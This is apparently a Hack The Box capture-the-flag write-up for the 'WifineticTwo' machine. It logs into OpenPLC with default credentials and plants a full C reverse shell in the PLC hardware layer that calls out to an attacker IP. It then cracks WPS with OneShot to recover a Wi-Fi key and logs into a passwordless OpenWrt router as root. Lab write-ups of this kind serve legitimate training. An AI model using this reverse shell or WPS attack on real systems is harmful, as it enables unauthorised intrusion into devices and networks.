HTB - WifineticTwo [Medium]
TCP Scan
> TARGET=10.129.129.83 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| ssh-rsa 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
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBH2y17GUe6keBxOcBGNkWsliFwTRwUtQB3NXEhTAFLziGDfCgBV7B9Hp6GQMPGQXqMk7nnveA8vUz0D7ug5n04A=
| 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKfXa+OM5/utlol5mJajysEsV4zb/L0BJ1lKxMPadPvR
8080/tcp open http-proxy syn-ack ttl 63 Werkzeug/1.0.1 Python/2.7.18
| http-methods:
|_ Supported Methods: HEAD OPTIONS GET
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was http://10.129.129.83:8080/login
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| content-type: text/html; charset=utf-8
| content-length: 232
| vary: Cookie
| set-cookie: session=eyJfcGVybWFuZW50Ijp0cnVlfQ.ZfoG_A.GhQOx-rtXPjtVycbVDqQLuNr21E; Expires=Tue, 19-Mar-2024 21:48:24 GMT; HttpOnly; Path=/
| server: Werkzeug/1.0.1 Python/2.7.18
| date: Tue, 19 Mar 2024 21:43:24 GMT
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 302 FOUND
| content-type: text/html; charset=utf-8
| content-length: 219
| location: http://0.0.0.0:8080/login
| vary: Cookie
| set-cookie: session=eyJfZnJlc2giOmZhbHNlLCJfcGVybWFuZW50Ijp0cnVlfQ.ZfoG-A.a0emE6-YjVwOjaYjv22hTUkh7f8; Expires=Tue, 19-Mar-2024 21:48:20 GMT; HttpOnly; Path=/
| server: Werkzeug/1.0.1 Python/2.7.18
| date: Tue, 19 Mar 2024 21:43:20 GMT
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>Redirecting...</title>
| <h1>Redirecting...</h1>
| <p>You should be redirected automatically to target URL: <a href="/login">/login</a>. If not click the link.
| HTTPOptions:
| HTTP/1.0 200 OK
| content-type: text/html; charset=utf-8
| allow: HEAD, OPTIONS, GET
| vary: Cookie
| set-cookie: session=eyJfcGVybWFuZW50Ijp0cnVlfQ.ZfoG-g.GXJeUt0is4lVqxduOK3TCGNt0E8; Expires=Tue, 19-Mar-2024 21:48:22 GMT; HttpOnly; Path=/
| content-length: 0
| server: Werkzeug/1.0.1 Python/2.7.18
| date: Tue, 19 Mar 2024 21:43:22 GMT
| RTSPRequest:
| HTTP/1.1 400 Bad request
| content-length: 90
| cache-control: no-cache
| content-type: text/html
| connection: close
| <html><body><h1>400 Bad request</h1>
| Your browser sent an invalid request.
|_ </body></html>
|_http-server-header: Werkzeug/1.0.1 Python/2.7.18
port 8080
- Found OpenPLC
- Default login works
openplc:openplc
- dirsearch
> dirsearch -u http://10.129.129.83:8080
[10:53:42] 200 - 4KB - /login
- Found https://www.exploit-db.com/exploits/49803
- The exploit doesn’t work out of the box, so exploit it manually
User
- Login to the webserver
- In ‘/program’, ensure the Blank Program is launched
- In ‘/hardware’, update
Blank Linux
with the following, then set up a nc listener and start the PLC
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int ignored_bool_inputs[] = {-1};
int ignored_bool_outputs[] = {-1};
int ignored_int_inputs[] = {-1};
int ignored_int_outputs[] = {-1};
void initCustomLayer()
{
}
void updateCustomIn()
{
}
void updateCustomOut()
{
int port = 4444;
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("10.10.16.59");
connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"/bin/sh", NULL};
execve("/bin/sh", argv, NULL);
}
> cat user.txt
d1f4dcd0c9f63b553162f8e413459f1e
PE
root@attica03:/root# ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
root@attica03:/root# ip link show #List available interfaces
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0@if20: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000
link/ether 00:16:3e:79:d1:d2 brd ff:ff:ff:ff:ff:ff link-netnsid 0
7: wlan0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000
link/ether 02:00:00:00:04:00 brd ff:ff:ff:ff:ff:ff
root@attica03:/root#
iwconfig #List available interfaces
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
root@attica03:/root# airmon-ng check kill #Kill annoying processes
bash: airmon-ng: command not found
root@attica03:/root# airmon-ng start wlan0 #Monitor mode
bash: airmon-ng: command not found
root@attica03:/root# airmon-ng stop wlan0mon #Managed mode
bash: airmon-ng: command not found
root@attica03:/root# airodump-ng wlan0mon #Scan (default 2.4Ghz)
bash: airodump-ng: command not found
root@attica03:/root# airodump-ng wlan0mon --band a #Scan 5Ghz
bash: airodump-ng: command not found
root@attica03:/root# iwconfig wlan0 mode monitor #Put in mode monitor
Error for wireless request "Set Mode" (8B06) :
SET failed on device wlan0 ; Device or resource busy.
root@attica03:/root# iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
Error for wireless request "Set Mode" (8B06) :
SET failed on device wlan0mon ; No such device.
root@attica03:/root# iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
BSS 02:00:00:00:01:00(on wlan0)
SSID: plcrouter
* Authentication suites: PSK
* SSID List
WPS: * Version: 1.0
- Note SSID
SSID: plcrouter
* Authentication suites: PSK
* SSID List
WPS: * Version: 1.0
- WPS is used, exploit with https://github.com/nikita-yfh/OneShot-C
root@attica03:/root# iw dev wlan0 scan
iw dev wlan0 scan
BSS 02:00:00:00:01:00(on wlan0)
last seen: 185057.752s [boottime]
TSF: 1710891209235766 usec (19801d, 23:33:29)
freq: 2412
beacon interval: 100 TUs
capability: ESS Privacy ShortSlotTime (0x0411)
signal: -30.00 dBm
last seen: 0 ms ago
Information elements from Probe Response frame:
SSID: plcrouter
Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0
DS Parameter set: channel 1
ERP: Barker_Preamble_Mode
Extended supported rates: 24.0 36.0 48.0 54.0
RSN: * Version: 1
* Group cipher: CCMP
* Pairwise ciphers: CCMP
* Authentication suites: PSK
* Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
Supported operating classes:
* current operating class: 81
Extended capabilities:
* Extended Channel Switching
* SSID List
* Operating Mode Notification
WPS: * Version: 1.0
* Wi-Fi Protected Setup State: 2 (Configured)
* Response Type: 3 (AP)
* UUID: 572cf82f-c957-5653-9b16-b5cfb298abf1
* Manufacturer:
* Model:
* Model Number:
* Serial Number:
* Primary Device Type: 0-00000000-0
* Device name:
* Config methods: Label, Display, Keypad
* Version2: 2.0
- compile, upload, run
> curl http://10.10.16.59/oneshot -o oneshot
> chmod +x oneshot
> sudo ./oneshot -i wlan0 -b 02:00:00:00:01:00 -K
[*] Running wpa_supplicant...
[*] Trying pin 12345670...
[*] Scanning...
[*] Authenticating...
[+] Authenticated
[*] Associating with AP...
[+] Associated with 02:00:00:00:01:00 (ESSID: plcrouter)
[*] Received Identity Request
[*] Sending Identity Response...
[*] Received WPS Message M1
[P] E-Nonce: a0a6bae4f019a2bd19d519ac0d163373
[*] Building Message M2
[P] PKR: a0598617be6c74bb48ade197f78fb10900c3a47ff22502297b462d8b9825d1647a50523e3f214ed382eae63b327da9927228d34fe381f228304a05e6ac20a4d03f0de97f829560a8ceb744f360c93c5099ae97cb2990b4694496f6599ef7f6c3f94b198a531f73ff19e35b93da557a709834bc0dc3f8f9619c1d82c28d22333ccc0ca0714379bbd8881bf6a962c214d373ac0d24fc1604ae5866919ab3fe8792435e8731c219d05fe3f7558831c4e75b883a3936cdd7f6d8d338b84b076f6519
[P] PKE: 4813d0e5b62e8b4b716c683ac30a0953aaaa53881bd46802bc1a9b836f004a68054675c3de7e09a8f612767df984d00c4ab47c96981196161e91ab6752432d33052da48dccb4bbf37818e6563308040268c1e79b7a922753579b753697b1dcba79da0860220fc45db5c16a27d1ef28ed4de3693510c38f9436875fdb13adc95bbc4b33852c4bcd4ac2144cb775201ac527a7a3b090431be210c47a2754f20a7ce3dddc143b79331b1e615714cfbc9f802a78a1c1ba193c77eed711bedb1e0a7e
[P] Authkey: 14e7260163308431168c7956aa1e956c1942bd7938d5285db60078e9de7c0713
[*] Received WPS Message M3
[P] E-Hash1: 35bd90d4201f47f44e00721fe11bad56acb86b011bbee1519b2530f0302aa0a4
[P] E-Hash2: 23e1629863547df1d8a28b4a42cac1add7bcb1fc30edd4c943161edeaf3443c6
[*] Building Message M4
[*] Received WPS Message M5
[*] Building Message M6
[*] Received WPS Message M7
[+] WPS PIN: 12345670
[+] WPA PSK: NoWWEDoKnowWhaTisReal123!
[+] AP SSID: plcrouter
- connect to wifi
# config
network={
ssid="plcrouter"
psk="NoWWEDoKnowWhaTisReal123!"
pin="12345670"
}
or
> wpa_passphrase plcrouter 'NoWWEDoKnowWhaTisReal123!' > config
> wpa_supplicant -i wlan0 -c config -B
> ifconfig wlan0 192.168.1.11 netmask 255.255.255.0
> ifconfig wlan0 up
- login to the gateway
root@attica02:/root# ssh -o StrictHostKeyChecking=no root@192.168.1.1
ssh -o StrictHostKeyChecking=no root@192.168.1.1
Pseudo-terminal will not be allocated because stdin is not a terminal.
_______ ________ __
| |.-----.-----.-----.| | | |.----.| |_
| - || _ | -__| || | | || _|| _|
|_______|| __|_____|__|__||________||__| |____|
|__| W I R E L E S S F R E E D O M
-----------------------------------------------------
OpenWrt 23.05.2, r23630-842932a63d
-----------------------------------------------------
=== WARNING! =====================================
There is no root password defined on this device!
Use the "passwd" command to set up a new password
in order to prevent unauthorized SSH logins.
--------------------------------------------------
id
uid=0(root) gid=0(root)
ls-la
-ash: ls-la: not found
ls -la
drwxr-xr-x 2 root root 4096 Jan 7 21:20 .
drwxr-xr-x 17 root root 4096 Mar 18 11:15 ..
-rw-r----- 2 root root 33 Mar 18 11:15 root.txt
cat root.txt
61dfeb126e3ef1900f2ead7503bca7e4